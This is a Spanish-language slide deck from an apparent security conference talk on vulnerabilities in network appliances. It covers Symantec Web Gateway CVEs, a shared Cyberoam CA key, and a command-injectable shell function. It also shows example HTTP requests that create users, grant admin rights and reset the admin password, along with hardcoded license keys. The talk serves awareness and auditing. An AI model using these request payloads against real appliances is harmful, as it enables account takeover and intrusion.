Date post: | 13-Jul-2015 |
Category: |
Documents |
Upload: | z0mbiehunt3r |
View: | 119 times |
Download: | 4 times |
CATS:ALL YOUR APPLIANCES ARE BELONG TO US
NAVAJA NEGRAConference
Disclaimer
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec non risus eros. Suspendisse ac quam et augue malesuada venenatis. Fusce condimentum libero ac tellus sagittis convallis. Nullam ut enim nisl. Suspendisse tincidunt elit eget turpis consectetur mollis lacinia felis
aliquam. Esta charla es con fines educativos y de concienciación. Curabitur et libero leo, vel mattis ipsum. Mauris laoreet nibh ac mauris convallis at lacinia eros rutrum. Donec porttitor semper neque, eu fringilla mi egestas at. Donec gravida aliquam sem, sed ornare nisi euismod ut. Etiam sed odio ut nisi egestas rhoncus ut vel augue. In hac habitasse platea dictumst. Phasellus eros turpis, varius ac sodales sit amet, lobortis non elit.
Dos dementes contra el mundo
Alejandro Nolla Blanco
Threat Intelligence Analyst
Apasionado del networking
@z0mbiehunt3r
Rubén Garrote García
Consultor de seguridad / Pentester
Apasionado del reversing
@boken_
Esta diapositiva está patrocinada por
Agenda
Full Disclosure Vs Responsible Disclosure
¿Por qué auditar nuestros appliances?
Situación actual
Demo!
Conclusiones y recomendaciones
“El trasto este viene hardenizado de serie” ¿Para qué comprometer un appliance?
Pero no toques, ¿por qué tocas?
Pero eso... será complicado, ¿no?
Yo no estoy comprometido - ¿Cómo lo sabes?
¿Estás seguro de que puedes confiar ciegamente?
Pero no toques, ¿por qué tocas?
Out-of-the-box (in)security
Out-of-the-box (in)security
Symantec Web Gateway 5.0.x.x
CVE Fallo
CVE-2012-2953 command execution
CVE-2012-2957 local file inclusion
CVE-2012-2574 Blind SQL injection
CVE-2012-2961 SQL injection
CVE-2012-2976 shell injection
CVE-2012-2977 Cambio arbitrario de credenciales
Out-of-the-box (in)security
Examination of a certificate chain generated by a Cyberoam DPI device shows that all such devices share the same CA certificate and hence the same private key. It is therefore possible to intercept traffic from any victim of a Cyberoam device with any other Cyberoam device - or to extract the key from the device and import it into other DPI devices, and use those for interception.
Out-of-the-box (in)security
Out-of-the-box (in)security
WANTED
Certificados SSL
Claves SSH
Usuarios no documentadoS
Puertas traseras
Escalada de privilegios
Fallos Web
Para más información visitar el proyecto Common Weakness Enumeration (http://cwe.mitre.org)
OS Injection
do_addvs()
{
# We are now going to handle a POST which is a real add
# echo "<!-post = $post>"
# vip=&port=&protocol=tcp&Commit=Add+VIP
[…]
grep -v "^%.*%" $f | sed -e "s/%PORT%/$port/" -e "s/%VIP%/$vip/" -e "s/%PROT%/$protocol/" -e "s/%NAME%/$FFF/"> $VIF[…]
}
Creamos un usuario nuevoGET /config/password.php?action=edituser&t=1326400365&username=new_user&pass=new_pass&group=report&type=new&go=Add+New+User HTTP/1.1
Hacemos admin a cualquier usuario
GET /config/password.php?action=edituser&t=000&username=new_user&pass=new_pass&group=config&uid=4&go=Edit+User HTTP/1.1
Cambiamos la contraseña a cualquier usuario
GET /config/password.php?action=edituser&t=1326152517&username=admin&pass=123abc.&uid=0&go=Edit+User HTTP/1.1
Súper C RF (allí donde se le necesite)
function validate_key($key) {
[...]
$keys_va_r16 = array("CrUC7e3en2cH",
"P4E5RAswaR4c",
"YaYaY5w2ZaPr",[...]
"w9E4edasuthe",
"drub8spaT7uj");
if (in_array($key, $keys_va_r16)) {cp($model_va_r16, $model_current);
}[…]
write_licence(False, 0);
echo "<center><p>Licence activated.</p></center>";
Tirando la casa por la ventana...
¿Cómo encontrar estos fallos?
Auditoría tipo “caja negra” y/o “caja blanca”
Análisis estático y/o dinámico
RTFC (Read The Fucking Code)
Mediante fuzzing
Consecuencias
✗ Bypass de las medidas de protección
✗ Compromiso total del dispositivo
✗ Aumento de la intrusión
✗ Interceptación del tráfico de red
Aumentando la intrusión - I
DMZ
RED INTERNA
INTERNET
GET /blablabla HTTP1.1
Aumentando la intrusión - II
DMZ
RED INTERNA
INTERNET
Conexión SSH
It's show time!
Conclusiones
➢ Si auditas tus aplicaciones, ¿por qué no tus appliances?
➢ ¿Por qué implantar algo que desconocemos?
➢ En todas partes se cumplen plazos de entrega
✔Nunca confíes ciegamente en nada
Recomendaciones
✔Disminuir la superficie de exposición
✔Revisar la infraestructura existente
✔En caso de duda, el entorno es hostil